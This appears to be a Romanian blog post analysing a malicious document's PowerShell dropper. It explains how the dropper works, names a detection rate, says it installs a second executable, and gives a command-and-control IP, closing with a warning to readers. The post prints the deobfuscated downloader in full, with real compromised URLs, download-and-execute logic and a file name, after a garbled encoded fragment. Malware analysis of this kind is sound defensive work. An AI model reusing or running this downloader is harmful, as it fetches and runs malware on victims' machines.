�{�[�D�i�a�g�n�o�s�t�i�c�s�.�P�r�o�c�e�s�s�]�:�:�"�s��T�a�R�T�”�(�$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�O�h�d�u�j�p�w�h�m�z�t�a�g�=�’�D�w�l�k�w�n�w�j�z�y�u�s�’�;�b�r�e�a�k�;�$�X�x�o�l�v�k�t�q�=�’�H�q�h�u�j�j�g�z�d�z�’�}�}�c�a�t�c�h�{�}�}�$�A�f�i�i�s�x�d�v�=�’�Q�g�p�c�f�o�l�o�y�n�k�z�d�’�

Decryptata are mai multe informatii interesante:

$Matedvtnd=’Hijrlklcnb’;$Xgmxijlqickli = ‘139’;$Laypotwkn=’Sskfcdsikwcc’;$Yqeishrftmp=$env:userprofile+’\’+$Xgmxijlqickli+’.exe’;$Razggeippsc=’Ykqbtxpz’;$Snyletzkfjfn=&(‘ne’+’w-o’+’b’+’ject’) neT.wEBCLiEnT;$Gapkseiveo=’http://trangvang.info.vn/home/poIc7l/https://www.flybuys.net/libraries/xes/http://informatic-club.com/language/y/http://demo.stickypost.io/wp-admin/g/https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/‘.”splIT"([char]42);$Gzjiuahjyryxt='Hgkcdsdf';foreach($Kxztalhpinv in $Gapkseiveo){try{$Snyletzkfjfn."dowNLOaDFilE”($Kxztalhpinv, $Yqeishrftmp);$Ytvjersyathw=’Ohjdgfbrtxl’;If ((.(‘Get-‘+’Item’) $Yqeishrftmp).”lengtH" -ge 32681) {[Diagnostics.Process]::"sTaRT”($Yqeishrftmp);$Ohdujpwhmztag=’Dwlkwnwjzyus’;break;$Xxolvktq=’Hqhujjgzdz’}}catch{}}$Afiisxdv=’Qgpcfoloynkzd’

Se pot observa domeniile accesate pentru a descarca virusul, dar si comenzile de Download, GET, Item, Start…

Se pare ca intradevar acel document nu este doar ceva de citit, ci contine comenzi de descarcare a unui fisier care stim ce este, dar poate fi orice altceva.
Mai in detaliu: $Xgmxijlqickli = ‘139’ +$Xgmxijlqickli+’.exe … deci avem un 139.exe, nu?

Avem polc7l care este descris ca fiind ATLUtils Module – adica Active Template Library si mai exact este chiar fisierul nostru 139.exe.
14 din 73… destul de rau pentru posibilele victime!

Acest fisier odata executat, instaleza un alt .exe in dispozitivul victimei(da, deja victima).

Acesta se conecteaza la Ip-ul/host-ul de unde vin toate comenzile hackerului.
Virusul in sine preia comenzi date de hacker si le executa la nivel de dispozitiv.
Exemple: se poate raspandi in retea, colecteaza date, trimite date, ataca, stocheaza date, spioneaza tastatura/camera/monitor etc.

In cazul nostru dispozitivul se conecteaza la adresa http://68.114.229.171/, iar acolo se gaseste acel C&C Panel, adica Panoul de Comanda si Control al atacatorului.

Cam asta ar fi pentru astazi.
In concluzie, daca ai o pagina web sau un server si nu sunt protejate, poti deveni parte activa la activitatile ilegale ale hackerilor.
Deocamdata acest lucru nu este pedepsit, dar… in timp lucrurile se pot schimba!

In ceea ce priveste adevarata victima, grija la ce documente accesati, indiferent de la cine credeti ca provin.